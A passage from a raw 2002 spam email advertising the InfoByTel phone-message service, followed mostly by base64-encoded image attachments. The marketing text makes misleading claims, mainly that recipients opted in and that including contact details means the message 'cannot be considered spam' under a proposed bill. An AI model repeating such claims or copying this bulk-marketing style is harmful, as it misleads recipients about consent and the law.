be stopped at no = cost to you by submitting a request to UNSUBSCRIBE_LIST1   Further, this = message cannot be considered spam as long as we include sender contact = information. You may contact us at (949) 218-6189 to be removed from = future mailings.       =20    =20 ------=_NextPart_001_0022_01C23272.92934220 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable InfoByTel: Your = Personal Sales Assistant!   Discover=20         InfoByTel! Imagine having a=20         Representative available to describe your Product or Service = precisely=20         as you want, 24/7 and Never Missing a Call from a prospective = customer=20         again!InfoByTel will provide your prospects with a = recorded=20         description of your product, service, property or business and = offer an=20         opportunity to reach you by telephone immediately, send you a = fax, or=20         leave a message requesting a response by telephone, fax or=20         email.At the same time your prospects utilize the = interactive=20         features of InfoByTel; the system will create an instant online = report=20         of their telephone number and time &amp; date of their call for = you.=20          Listen to = an=20         Exampleof InfoByTel @ Work!Call: (949) = 218-6150  Email InfoByTel=20         Now  InfoByTel=20         DistributorBusiness Opportunity Hotline!Call: (949)=20         218-6180 By calling this = one number=20         you may elect to be connected to a representative. If a = representative=20         is not immediately available you will have an opportunity to = request a=20         response by telephone, fax or email. = This=20         is a One-Time Email Presentation.=20          Your privacy is extremely important to = us. =20         We are committed to delivering a highly rewarding = experience.  Your=20         information was obtained in good faith as an opt-in or = permission=20         email.  We do everything to protect your privacy.  If = you=20         still wish to be assured that you will not receive further email =         messages, please reply with the word "REMOVE" on the subject = line.=20          Thank You. = TO UNSUBSCRIBE OR UPDATE YOUR E-MAIL =         ADDRESS = You have=20         received this e-mail because you have subscribed to or asked for = offers=20         via email from our organization or another affiliate that we may = work=20         with.  To unsubscribe, send an email to special@busnweb.com.  To=20         update your email address for future offers, please "reply" with = your=20         correct contact information. This e-mail=20         message and its contents are copyrighted and are proprietary = products of=20         Busnweb.com, Inc..  Copyright 2002 Busnweb.com, Inc..  = All=20         rights reserved.  This message is=20         being sent to you in compliance with the proposed Federal = legislation=20         for commercial e-mail (S.1618 - SECTION 301). "Pursuant to = Section 301,=20         Paragraph (a)(2)(C) of S. 1618, further transmissions to you by = the=20         sender of this e-mail may be stopped at no cost to you by = submitting a=20         request to UNSUBSCRIBE_LIST1   = Further, this=20         message cannot be considered spam as long as we include sender = contact=20         information. You may contact us at (949) 218-6189 to be = removed=20         from future=20       = mailings.  =   ------=_NextPart_001_0022_01C23272.92934220-- ------=_NextPart_000_0021_01C23272.92934220 Content-Type: image/gif; 	name="image001.gif" Content-Transfer-Encoding: base64 Content-ID: &lt;001f01c232ad$3ee2d7e0$7f16e7d8@mailbox&gt; R0lGODlhQgAUAHcAMSH+GlNvZnR3YXJlOiBNaWNyb3NvZnQgT2ZmaWNlACH5BAEAAAAALAAAAAAB AAEAgAAAAAECAwICRAEAOw== ------=_NextPart_000_0021_01C23272.92934220 Content-Type: image/jpeg; 	name="image002.jpg" Content-Transfer-Encoding: base64 Content-ID: &lt;002001c232ad$3ee5e520$7f16e7d8@mailbox&gt; /9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAQQAA/+IMWElDQ19QUk9GSUxFAAEB AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0 IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0 IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA +wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5 AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3 Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01 hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5 KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6 hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB 48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4 0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c 7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9 uv5L/tz/bf///+4ADkFkb2JlAGTAAAAAAf/bAIQABQQEBAQEBQQEBQcFBAUHCQYFBQYJCggICQgI Cg0KCwsLCwoNDAwMDQwMDA8PEREPDxcWFhYXGRkZGRkZGRkZGQEGBgYKCQoTDQ0TFhEOERYZGRkZ GRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZ/8AAEQgAgwHfAwER AAIRAQMRAf/EAL8AAAEEAwEBAAAAAAAAAAAAAAAFBgcIAgMEAQkBAQAABwEAAAAAAAAAAAAAAAAB AgMEBQYHCBAAAQIFAwEEBQgGCAYCAwAAAQIDABEEBQYhEgcxQVETCGFxgSIUkaEyQlKSVBWxI5NV FhfB0eFyglMkGPBiorLSM2M0Q3PTEQACAQMBBQILBQcEAQUBAAAAAQIRAwQFITFREgZBE2FxkaGx wdEiMlIUgUJTFgfw4YKS0iMV8WJyQ7KiwuIzJBf/2gAMAwEAAhEDEQA/ALlwAQAQAEyEz0EAI7mT 2Npam3K1tK0GSgT0Ii6WFeaqoskc4mP8VWD8c38sR+gv/Kx3kTz+K7B+Ob+WH0N75WO8iKlLV01a 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 